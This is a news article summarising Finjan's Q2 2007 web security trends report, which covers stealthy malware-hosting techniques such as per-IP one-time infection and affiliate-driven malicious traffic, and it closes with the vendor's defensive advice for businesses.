A new report details the current generation of threats to web security.
Finjan, which describes itself as a pro-active Web security and anti-spam specialist, has released its Q2 2007 IT security trends report.
The report details some interesting types of attacks designed to by-pass signature-based and database-reliant IT security technology.
The report also details the proliferation of affiliation networks based on a ‘hosted model’ for malicious code, which use off-the-shelf malicious code packages to compromise popular web sites.
The last major discovery on the malware and hacker attack front from Finjan was last year, when the company revealed hackers were starting to use code obfuscation (hiding) techniques to prevent their malware being discovered.
These techniques even stretched to storing the malware and/or infected code on a cached server, such as Google’s Webcache, meaning that conventional URL filters could not spot the malware, and allowed hapless web users to load up the infected pages without question.
But now it gets worse, as Finjan has discovered that hackers are keeping track of the actual IP addresses of visitors to a particular site or web page.
Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address.
Put simply, this means that the second time an IP address tries to access the malicious page, a benign page will be loaded in its place, causing all traces of the original infected pages to disappear.
According to the report, hackers are also being motivated by commercial greed, locating infected pages on a dedicated malicious code server and then offering affiliate codes - which are added to the web site URL - to third-party hackers.
These third-party hackers are then paid commissions according to the number of infected visitors to the main site.
Basically hackers are being rewarded for driving traffic by fair means or foul (and usually the latter) to a malware-laden web site.
For the master hackers involved in these types of scams, the rewards are potentially quite high, as the infected pages load key logging and other site logging programs to the hackee’s PC.
The hackee’s PC then drip feeds personal data such as bank account log-in details and credit card details back to a web storage site, from which the hacker’s harvest data for fraudulent usage.
According to Yuval Ben-Itzhak, Finjan’s CTO, the problem with these types of attacks is that a growing number of sites are getting hit by stealthy attacks.
These attacks, he says, leave no visible damage and simply insert a line of HTML code that points to malicious code on an external server.
“The upshot is that any visitor to such a site may be jeopardising his/her personal identity, bank account details and credit card numbers to the criminals behind these operations,” he explained.
As you might expect, Ben-Itzhak is keen to promote Finjan’s IT security technology, but he does note - quite correctly - that businesses that rely solely on signature-based anti-virus or URL filtering technology may be left vulnerable to these types of attacks.
Against this backdrop, Finjan offers the following advice for business users of IT security technology:
1. Make sure that real-time inspection and protection is added to your web security solution. Chasing the attack vectors after the event is always ‘too little, too late’, particularly if you get hit by a zero-day attack that your security solution does not recognise.
2. Make sure that your IT security technology is updated to handle new technologies and trends. Security products should protect you from the vulnerabilities rather than just attacks and exploits.
3. Check your vendor’s research capabilities and its ability to provide up-to-date information which is immediately translated into actionable security measures.
4. Examine your egress data policy to make sure that you cover all known and suspicious sites.